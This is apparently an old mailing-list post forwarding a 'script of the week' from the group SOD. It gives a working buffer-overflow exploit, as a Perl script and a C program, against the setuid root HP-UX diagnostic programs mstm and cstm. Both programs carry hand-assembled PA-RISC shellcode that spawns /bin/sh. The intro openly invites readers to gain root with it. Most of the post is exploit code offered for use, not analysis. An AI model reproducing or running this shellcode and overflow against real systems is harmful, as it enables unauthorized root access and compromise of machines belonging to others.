This week: turn me on, dead man

[aleph1 () underground org (Aleph One)]

> From our SOD friends. Sponsored by the HP security team & the
energizer bunny. They keep going, and going, and going.

Aleph One / aleph1 () underground org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

--- cut here ---
   Well, hello. Welcome back. We're glad to see you. Have a drink. Take
   off that overcoat. Put down that submachine gun. Lay on the couch and
   pretend you're a duck. I'll be over here sending scripts to the
   masses. This week's script is the first of the buffer-overruns and it
   buggers up two very similar setuid root programs in /usr/diag/bin,
   mstm and cstm. It's only been playtested on the 9's, so use with care
   on the 10's, and as always, start clicking your way to root access
   with scripts from the folks at SOD.

Caveat Emptor

   mstm and/or cstm loves you perl script and C src for this week

--- stmo.pl ---
#!/usr/bin/perl

# working exlpoit for 9.X setuid root /usr/diag/bin/[cm]stm

use FileHandle;

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

$code="AA"; # two byte alignment

$code.=h2cs("34010102"); # ldi 129,r1
$code.=h2cs("08220401"); # sub rp,r1,r1
$code.=h2cs("602002a6"); # stb r0,339(r1)
#$code.=h2cs("602002ac"); # stb r0,342(r1)
$code.=h2cs("b43a0298"); # addi 332,r1,arg0
$code.=h2cs("34160176"); # ldi 187,r22
$code.=h2cs("34010276"); # ldi 315,r1
$code.=h2cs("08360216"); # and r22,r1,r22
$code.=h2cs("20200801"); # ldil l%c0000004,r1
$code.=h2cs("e420e008"); # ble 4(sr7,r1)
$code.=h2cs("08210280"); # NOP == xor r1,r1,r0
#$code.=h2cs("deadcafe"); # illegal instruction
$num=208-length($code);
$code.="C"x$num;

$data="/bin/sh.sh.";
$num=16-length($data);
$data.="D"x$num;

$num=224-length($of);
$of=$code.$data;
$of.=h2cs("7b03301B");
print "Length is: ",length($of),"\n";
exec("/usr/diag/bin/mstm","-l","$of");

--- stmo.c ---
/* SOD /usr/diag/bin/[cm]stm buffer overflow */

main()
{
char buf[500];

strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");

execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);
/* Either-or, same overflow */
execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);
}